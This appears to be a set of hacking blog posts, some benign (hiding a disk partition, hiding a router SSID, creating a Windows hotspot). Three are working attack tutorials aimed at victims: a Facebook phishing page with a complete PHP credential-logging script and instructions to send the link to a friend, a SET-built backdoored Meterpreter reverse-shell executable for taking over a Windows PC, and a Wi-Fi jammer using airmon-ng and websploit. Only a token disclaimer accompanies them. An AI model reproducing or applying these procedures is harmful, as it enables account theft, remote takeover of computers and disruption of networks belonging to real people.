SHUBHAM KANSARA

Just For Hacking

Monday 18 January 2016

HACK FACEBOOK USING PHISHING ATTACK










As we all want to hack our friend's facebook account,and want to read all his/her personal things.
Today i'm gonna teach you how to hack someone's  facebook account using  phishing page.





NOTE:- Phishing is illegal activity so don't try on anyone.This Tutorial is only for learning purpose.We will Not Hold any responsibility if it is being missused.


PHISHING:-

Phishing is a form of fraud in which the attacker tries to learn information such as login credentials or account information by masquerading as a reputable entity or person in email, IM or other communication channels.

Typically a victim receives a message that appears to have been sent by a known contact or organization. An attachment or links in the message may install malware on the user’s device or direct them to a malicious website set up to trick them into divulging personal and financial information, such as passwords, account IDs or credit card details. Phishing is a homophone of fishing, which involves using lures to catch fish.

To make phishing messages look like they are genuinely from a well-known company, they include logos and other identifying information taken directly from that company’s website. The malicious links within the body of the message are designed to make it appear that they go to the spoofed organization. The use of subdomains and misspelled URLs (typosquatting) are common tricks, as is homograph spoofing -- URLs created using different logical characters to read exactly like a trusted domain. Some phishing scams use JavaScript to place a picture of a legitimate URL over a browser’s address bar. The URL revealed by hovering over an embedded link can also be changed by using JavaScript.


Today we create a facebook phishing page which look similar to a facebook page  but it is not actually a facebook page,when victim enter his/her username and password  you will be able to see that.

 CREATE FACEBOOK PHISHING PAGE:-

  • Go to the facebook page,then right click  on the page,You See the option view source page .click on that.

          open browser->go to facebook login page->right click->view source page 


         


  •         New tab will open  which contains a source code.



  • create a a new  Notepad file and save it as index.html
  • Now open index.html using Notepad++ and Paste all source code.




  • Now press  CTRL+F,and type action.




  • You will have to find a text which look like this :-
         action="https://www.facebook.com/login.php? login_attempt=1&lwv=111"




  • Delete all the text written in inverted comma and insted of it write post.php
     




  • Now Open a new Notepad and save the given data with the name post.php
<?php
header('Location:http://www.facebook.com/');
$handle=fopen("username.txt","a");
foreach($_POST as $variable=>$value){
fwrite($handle,$variable); 
fwrite($handle," =");
fwrite($handle,$value);
fwrite($handle,"\r\n");
}
fwrite($handle,"\r\n");
fclose($handle);
exit;
?>
  • Now You have Two files one  is index.html and another is post.php 
  • Now You Have To Upload It in a web hosting site,I prefer to use 000webhost.com  

  • After Uploading, Copy the Url Of that page and send link to your victim,When Your victim try to login in to it with the username and password the page redirectly connect  to facebook and You will be able to see your victim's username and password.

  • Now Open Your 000webhost account go to file manager then public_html,You can see username.txt


  • open  usename.txt file You can see  victim's  usename and password.  


Thank You

Sunday 11 October 2015

HIDE OR UNHIDE YOUR DISK PARTITION IN WINDOWS 8.1/8/7/XP WITHOUT ANY SOFTWARE[HOW TO]

Hidding a hard drive or partition in windows can be an effective way of preventing access to the drive's content.Hidding a partition or volume from cmd is preventing that partition from displaying,but it does not mean erasing any data or any partition.

TO DO THIS TASK YOU NEED ADMINISTRATOR PRIVILEGE.

SO LET'S START:-



1. Go to Run->Type Cmd->Open cmd

2. Type diskpart




3.Then type list volume




4. Select volume which you want to hide.(Here i am selecting "volume 3")
Then a message will appear in same window { Volume 3 is the selected volume}


5. Now type "remove letter D"
Now a message will come { Diskpart Removed the Drive letter }




If You want your partition back then you have to do this process.



You have to do the same process which you done to hide drive but in the 5th step you have to write "ASSIGN LETTER D".this command will unhide your drive.
Now Enjoy this cool method.

NOTE:- EVEN IF YOU SEARCH FOR ANY FILE,THE SEARCHING WILL NOT BE DONE IN THAT HIDEDEN DRIVE.

Wednesday 7 October 2015

HIDE YOUR WIFI NETWORK & PREVENT IT FROM BEING SEEN

HOW TO HIDE YOUR ROUTER'S SSID OR NETWORK NAME

 

 The ssid-service set identifier of a router is the name that it broadcasts to identify itself. This feature you have already use if you have ever connected to a wireless router or network,and it helps user to separate the diffrent signals.
For example you visit any shop with free wifi,you usually know the right network to connect to because it is labeled with the shop’s name.

When you turn off SSID broadcast, others won’t be able to pick up the broadcast of your wireless network and they won’t know to whom the network belongs to.

NOTE:- Hiding your SSID won’t hide your wi-fi network from someone using a wifi network scanner.  Anyone who is going to try and crack a wireless network will be using one of those anyway.


So Let's start................

 


 1.D LINK


    step 1:- "Open http://192.168.0.1" -->"log in".

    step 2:-select "wireless" --> "wireless basics"--> "clear Enable ssid broadcast checkbox"-->"save setting or apply the change".

2. Belkin


   Step 1:- "Open http://192.168.2.1" -->"log in".
   
   step 2:- "wireless"-->"channel and ssid"-->"clear broadcast ssid checkbox".

   step 3:- "save setting or apply the change".

3.  netgear


   step 1:- "Open http://192.168.1.1" -->"log in".
   
   step 2:- "advanced"-->"wireless setting"--> "uncheck Enable SSID Broadcast."

   step 3:-"click apply."

4. linksys


    step 1:- "Open http://192.168.1.1" -->"log in".

    step 2:- "Wireless"-->"Basic wireless setting"-->"Disabled ssid broadcast"
  
    step 3:- "save setting".

Note:- if your router operates on a dual band, do this for both the 5GHz and 2.4GHz configurations.




                                                 SHUBHAM KANSARA

Sunday 6 September 2015

CREATE WIFI HOTSPOT USING CMD IN WINDOWS

you have no router ??????????
no problem.............
Today I am going to show you how to create your own wifi- hotspot using  windows command prompt...

so let's begin.......

note:- In this Tutorial i am using windows 8.1 but this method work on evey                    windows  operating system.



Step 1:-

             open the command prompt as administrator.In windows 8 and above you can do this by pressing "windows logo key+X" and select the command prompt(admin) as shown in below screenshot.




Step 2:-

           At first you have to check whether your wifi adapters supports hosted network mode or not?


 So type the  below command in command prompt

"netsh wlan show drivers"
If it is yes then you can create hotspot,otherwise you have to upgrade your wifi adapter or drivers.


step 3:-

in view of that your adapter has support for hosted network mode, type the below command in command prompt

netsh wlan set hostednetwork mode=allow ssid=wifi_network key=0123456789

ssid= name of wifi you want to create
key= your wifi password.


step 4:-

next type the command "netsh wlan show hostednetwork".



step 5:-



next type the command "netsh wlan start hostednetwork name of your wifi you already created" to start the hotspot and press enter.

 
for example:- netsh wlan start hostednetwork wifi_network




To stop the hotspot you just have to type stop instead of start in the above command.



That is " netsh wlan stop hostednetwork wifi_network"




IF YOU GET THE ERROR LIKE " THE HOSTED NETWORK COULD NOT BE STARTED OR YOUR PHONE CAN NOT CONNECT TO HOSTED NETWORK. I WILL TELL YOU HOW TO FIX THIS ERROR.




1.How to Fix " The Hosted Network Could Not be Started in windows

steps:-

1.  open "device manager" and click on "view"-->"show hidden device"


2.  move to "network adapters" and search to      "microsoft hosted network virtual adapter"

3. Right click on it and choose "Enable".


2. Your Phone Can Not Connect to Hosted Network. 

Seems like the IP address set on the computer is incorrect.

Please check the IP address set for the Wireless network adapter.

Steps:-

1. Type Command prompt in the Start menu and press enter.
2. In the Command prompt, type ipconfig /all and press enter.
3. This will show the IP address that is set to the ethernet cards. (Both wired and wireless)
4. If you see the address starting from 169.xxx.xxx.xxx, then you will not be able to connect to Internet or devices. In such cases, you need to manually set a static IP address for the wireless network adapter.
5. Type the following commands in command prompt to release and renew the IP address.
   ipconfig /release
   ipdonfig /renew
6. check if the computer is detected by the phone in wireless networks.

If the issue persists, then  set a manual IP address for wireless network.
1. Press Windows key and R key to open Run prompt.
2. Type ncpa.cpl and press enter.
3. Right click on the wireless network and click on properties.
4. Select IP4(Internet protocol version 4) and click on properties.
5. Place a check mark on "Use the following IP address"
6. Set a manual IP address. For example: 192.168.2.3 and the subnet 255.255.255.0
7. Press ok and close the Windows.
8. Check if the phone is able to view the computer through wireless connection.


Since hosted network is a temporary wireless connection, you may have to re-create it after every reboot.

Hope this information helps you.


Tuesday 23 June 2015

HACK WINDOWS PC USING KALI LINUX

 


WHAT IS SOCIAL ENGINEERING TOOLKIT ?
  • Social engineering toolkit(SET) is an exploitation framework for social engineering attacks like phishing, web attacks, hack windows machines etc.

So let's begin:-

REQUIREMENTS:

1. Kali Linux: Get it Here.


Steps:
  • Launch SET. In kali linux it can be found in Applications>Kali linux>Exploitation Tools>Social Engineering Toolkit>setoolkit.
       Or you can start from the Terminal by typing setoolkit
 

  • The following screen will be opened.

  • Select option 1-Social Engineering Toolkit.

  • Select option 4-Create Payload and listener.

  • Enter attacker's IP address here. To check your ip address, type ifconfig in new terminal and you will find it.

  • Select option 2-Windows Reverse_TCP Meterpreter.

  • Select option 4-Backdoored Executable.

  • Enter port of the listener 443. It will create a backdoored Executable file named payload.exe in SET's home directory (PATH: /usr/share/set/payload.exe).

  • Now type yes to start msfconsole.

  • Once msfconsole has been started transfer that payload.exe on victim's machine and run it on that machine.

  • Meterpreter session will be opened.

  • Migrate current process to another process to make sure your meterpreter session will remain open. To do this you must have process id of process to which you are migrating. use ps command to know all process currently running on victim's machine and its process id. 
                         migrate PID of another process
 

  • Here i am migrating to explorer.exe
  • help command gives you information about the commands that can be executed on victim's machine. 



   you can shutdown victim's machine.


  • You can do anything with victim's machine. You can shudown, reboot victim's machine. You can steal files from that machine and upload files to that machine. 
  • You can drop into system's shell. With that you can create a file on that machine, open a file, kill processes currently running on that machine and manymore.

 Thank You!!!


Monday 18 May 2015

WIFI NETWORK JAMMER USING KALI LINUX









INTRODUCTION

websploit is an open source project which is used to scan and analysis remote system in order to find various type of vulnerabilites.This tool is very powerfull and support multiple vulnerabilites.

NOTE :- Today through this tutorial i will tell you how to use wifi jammer throught websploit in kali linux.........



REQUIREMENTS

1. Pc or Laptop
2. kali linux 
3. wifi router
4. A brain


Now We will start the tutorial to jam the wifi network.


  • start kali linux and open command prompt( kali linux terminal).
              airmon-ng start wlan0






This Command Will Start The wlan0 In Monitor Mode Using airmon package.


  • Now lets start dumping the available wireless network information near your device by typnig this command
            airodump-ng mon0






This Command Will Show You All The Details Of A Wireless Network.


  • Now Open New terminal and type 
            websploit



                           OR Open Like This 
                  
            application > kali linux >  web application > web application fuzzers > websploit


  • Now run your wifi jammer type this command 
           use wifi/wifi_jammer



  • Now set the BSSID id of the network that you want to jam by typing this command
         set BSSID  E8:CC:18:B9:DC:FE



  • Now set the ESSID of the network that you want to jamn by typing this command
          set ESSID anynonymous




  • Now to activate wifi jammer simply type this command
            RUN

  • Now new terminal open which means your wifi jammer is started.




This is whole method to jam a wifi network. Just try to do it your own risk.

Thank you 

Shubham Kansara

kansara744.blogspot.in